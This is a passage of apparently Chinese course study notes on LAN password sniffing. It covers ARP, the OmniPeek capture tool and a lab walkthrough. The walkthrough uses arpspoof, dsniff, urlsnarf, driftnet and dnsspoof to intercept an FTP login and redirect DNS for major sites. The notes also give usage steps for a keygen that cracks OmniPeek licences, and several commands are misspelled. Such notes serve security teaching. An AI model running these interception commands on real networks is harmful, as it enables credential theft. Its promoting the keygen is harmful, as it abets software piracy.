安全牛学习笔记密码嗅探

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记密码嗅探相关的知识,希望对你有一定的参考价值。

密码嗅探                    

二、三层地址                

    - IP网络到网络          

    - MAC主机到主机         

交换机与HUB                 

    - HUB全端口转发         

    - 交换机根据学习地址转发

    - 混杂模式抓包                    

【课外拓展】局域网密码嗅探器,只需在自己的电脑上运行便可获取局域网中任意一台电脑的账号密码,支持交换机环境下的局域网目前支持嗅探POP3、FTP、SMTP、NNTP、IMAP、TELNET、HTTP、IRC协议中的密码,软件在线升级,同时还提供众多局域网管理工具软件

密码嗅探                    

Arp协议                     

    - 免费ARP               

    - 基于广播学习          

    - 以太网、ARP头         

    - 基于、响应相对独立    

    - 基于传闻的协议

【课外拓展】地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。相关协议有RARP、代理ARP。NDP用于在IPv6中代替地址解析协议。

Omnipeek

Omnipeek 是出自WildPackets的著名的抓包软件。

概述

编辑

其功能与Sniffer Pro有相似之处,但是经过多年的发展,其开发环境已经从VC++转移到了C#平台。

注;WildPackets是一家全球知名的软件公司,公司成立的目标在于针对复杂的网络环境,提供维护、除错及最佳化等工作的方案。而其开发的产品能够提供各个阶段的IT人员很容易就各种异质网络及网络通讯协定,执行管理、监控、分析、除错及最佳化的工作。

关于公司

自 1990 起,,Wildpackets就已经成功推出故障分析方案 (Fault analysis solutions),为全球各大型企业提供了既可靠又具稳定性的网络系统。由桌面计算机到数据中心 (Data Center),从无线局域网(Wireless LAN) 到千兆骨干网络(Gigabit backbones),无论是企业的内部网络或者是分布式网络的互连,Wildpackets 都能够为企业快速发现和处理影响网络的问题。全球超过5000名的客户正在使用 Wildpackets 的产品,协助他们解决网络系统的问题,从而提高网络系统的性能,这些客户涵盖了财富1000强公司中的80%。

关于Omni

Omni平台实现了从单一控制台进行全网范围的分析与故障诊断,包括广域网、无线网络。结合Omni DNX分布式引擎、专家分析系统,使用Omni的OmniPeek控制台能够并发、独立监控分析多个网段,管理员可以快速恢复业务系统,最大化网络可用时间。Omni平台非常容易进行部署、管理、扩展,是企业值得拥有的网络分析与故障诊断的解决方案。

基本介绍

OmniPeek 提供统一分析除错网络之管理介面,OmniPeek 让网络之管理者能透过统一之介面同时分析多个网段之网络状况,更进而分析底层之网络状况,以快速辨识问题的功能。基于WildPackets屡获殊荣的EtherPeek NX技术,Omni3 包含了OmniPeek控制台、分布式Peek DNX引擎。这些组件无缝的结合工作可以透视复杂的分布式网络。 OmniPeek OmniPeek将WildPackets的EtherPeek NX产品的本地分析能力扩展到远程网段。OmniPeek拥有EtherPeek NX所有受欢迎的特点功能,包括: · 基于信息包流的专家分析系统和应用分析 ·交互式节点图 · 完整的七层协议解码 · 应用响应时间(ART)分析 · 安全功能 · 监控与报表 · RMON分布式分析

OmniPeek同样有能力连接到远程运行多种应用的引擎。运行在Omni3 引擎上的首要应用是Peek DNX(Distributed Network eXpert分布式网络专家)。为了显示远程网段信息,OmniPeek从Peek DNX收集统计数据并进行相关分析。OmniPeek控制台的界面与操作方式都与EtherPeek NX相同:非常易于使用,诸如"选择相关数据包”等内嵌功能以及可客户化的界面。OmniPeek也用来配置远程引擎,包括过滤、报告、和专家系统等设置。只有在用户需要解码、分析或者本地保存数据包内容时,数据包文件才会被传送到OmniPeek。

选择一个好用的抓包软件很重要,OmniPeek不但具有信息包流的专家分析系统和应用分析,完整的七层协议解码,应用响应时间(ART)分析以及互式节点图等功能,同时还可以为您提供安全功能,与监控功能。有了OmniPeek,您就可以更好的进行抓包工作了。

omnipeek 7.9.1是出自WildPackets的著名的抓包软件。其功能与Sniffer Pro有相似之处,但是经过多年的发展,其开发环境已经从VC++转移到了C#平台。

OmniPeek拥有EtherPeek NX所有受欢迎的特点功能,包括基于信息包流的专家分析系统和应用分析,交互式节点图,完整的七层协议解码,应用响应时间(ART)分析,安全功能,监控与报表,RMON分布式分析!

monipeek注册机,已经测试过有的5.0、6.0、6.1、6.5、7.5的版本都可以注册,会被认为是病毒,这个不解释。

使用方法:

1、在Product的下拉框中选中OmniEngine Enterprise 

2、Product Version中选择对应的版本,比如你是6.5的版本就输入65 是7.5的版本就输入75即可。

3、看上以上说明仍不会用的建议回炉重造

官方介绍:

OmniPeek 提供统一分析除错网络之管理介面,OmniPeek 让网络之管理者能透过统一之介面同时分析多个网段之网络状况,更进而分析底层之网络状况,以快速辨识问题的功能。基于WildPackets屡获殊荣的EtherPeek NX技术,Omni3 包含了OmniPeek控制台、分布式Peek DNX引擎。这些组件无缝的结合工作可以透视复杂的分布式网络。 OmniPeek OmniPeek将WildPackets的EtherPeek NX产品的本地分析能力扩展到远程网段。

OmniPeek同样有能力连接到远程运行多种应用的引擎。运行在Omni3 引擎上的首要应用是Peek DNX(Distributed Network eXpert分布式网络专家)。为了显示远程网段信息,OmniPeek从Peek DNX收集统计数据并进行相关分析。OmniPeek控制台的界面与操作方式都与EtherPeek NX相同:非常易于使用,诸如"选择相关数据包”等内嵌功能以及可客户化的界面。OmniPeek也用来配置远程引擎,包括过滤、报告、和专家系统等设置。只有在用户需要解码、分析或者本地保存数据包内容时,数据包文件才会被传送到OmniPeek。

OmniPeek拥有EtherPeek NX所有受欢迎的特点功能:

· 基于信息包流的专家分析系统和应用分析

·交互式节点图 · 完整的七层协议解码

· 应用响应时间(ART)分析

· 安全功能

· 监控与报表

· RMON分布式分析!

NEW Capture----->Adntere----->local machine: RENBOX(本地连接)----->确定

Start Capture

C:\User\w7>arp -d

C:\User\w7>ping 192.168.1.1

Send----->Set Send Packet   //编辑内容

C:\User\w7>192.168.1.110

C:\User\w7>arp -a

接口:192.168.1.115 --- 0xb

  Internet 地址             物理地址                   类型

  192.168.1.1              14-75-90-21-4f-56    动态

  192.168.1.110          38-00-27-db-h2-af    动态

  224.0.0.2                  01-00-5e-00-00-16    静态

[email protected]:~# arp -an

? (192.168.1.115) at 08:00:27:19:91:2e [ether] on eth0

? (192.168.1.1) at 08:00:27:19:91:2e [ether] on eth0

[email protected]:~# ping 192.168.1.1

PING 192.168.1.1 {192.168.1.1) 56(64) bytes of data.

^C

... 192.168.1.1 ping statistics ...

3 packets transmitted, 0 received, 100% packet loss, time 2010ms

[email protected]:~# arp -d 192.168.1.1

密码嗅探                                                

手动修改数据包实现ARP欺骗                                 

arpspoof                                                 

    - echo 1 > /proc/sys/net/ipv4/ip_forward              

    - arpspoof -t 1.1.1.12 -r 1.1.1.1                     

网络嗅探                                                

    - dirftnet -i eth0 -a -d tempdir -s                   

    - dnsspoof -i eth0 -f /usr/share/dnsiff/dnsspoof.hosts

    - urlsnarf -i eth0                                    

    - webspy -i eth0 1.1.1.10                             

    - dnsiff -i eth0 -m                                   

      /usr/share/dsniff/dsniff.services

[email protected]:~# arp -t 192.168.1.115 -r 192.168.1.11     //实现双向欺骗

[email protected]:~# cat /proc/sys/net/ipv4/ip_forword

0

[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward

[email protected]:~# cat /proc/sys/net/ipv4/ip_forword

1

ip.addr eq 192.168.1.115

[email protected]:~# dirftnet -i eth0

[email protected]:~# dirftnet -i eth0 -a -d /tmp -s

[email protected]:~# webspy -i eth0

Version: 2.4

Usage: webspy [-i interface | -p pcapfile] host

[email protected]:~# webspy -i eth0 192.168.1.115

websyp: not running on display :1

openURL(http://58.63.137.200/(

webspy: not running on display :1

[email protected]:~# openvas-stop

Stopping OpenVas Services

[email protected]:~# urlsnarf -i eth0

[email protected]:~# dsniff -h

Version: 2.4

Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen]

              [-f services] [-t trigger[,...]] [-r|-w savefile]

              [expression]

[email protected]:~# dnsiff -i eth0 -m

dsniff: listening on eth0

--------------------

04/25/16 12:32:27 tcp 192.168.1.115.49889 -> 106.251.6.6.21 (ftp)

USER ftpuser1

PASS ftppassweord123

C:\user\w7>ftp

ftp> o 106.251.6.6

连接到106.251.6.6

220 FTP Server 1.2.4 <FTPD>

用户<106.251.6.6:<none>>: user

331 Password required for ftpuserl

密码:

530 Login incorrect.

登录失败

ftp>quit

221 Goodbye.

[email protected]:~# vi /usr/share/dnsiff/dnsspoof.hosts

192.168.1.1       *.taobao.com

192.168.1.1       *.google.com

192.168.1.1       *.youtbe.com

[email protected]:~# dnsspoof -i eth0 -f /usr/share/dnsiff/dnsspoof.hosts

dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.110]

192.168.1.115.63606 > 124.207.160.106.53:  24110+ A? www.taobao.com

192.168.1.115.63606 > 124.207.160.106.53:  24110+ A? www.taobao.com

192.168.1.115.63606 > 124.207.160.106.53:  3976+ A? www.google.com

192.168.1.115.63606 > 124.207.160.106.53:  3976+ A? www.google.com

192.168.1.115.63606 > 124.207.160.106.53:  22049+ A? www.youtube.com

192.168.1.115.63606 > 124.207.160.106.53:  22049+ A? www.youtube.com

[email protected]:~# netstat -panut | grep 53

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1971232

以上是关于安全牛学习笔记密码嗅探的主要内容,如果未能解决你的问题,请参考以下文章

安全牛学习笔记漏洞挖掘

安全牛学习笔记手动漏洞挖掘

安全牛学习笔记手动漏洞挖掘

安全牛学习笔记抓包嗅探

安全牛学习笔记基本工具-WireShark

安全牛学习笔记tcpdump简介及常用命令实例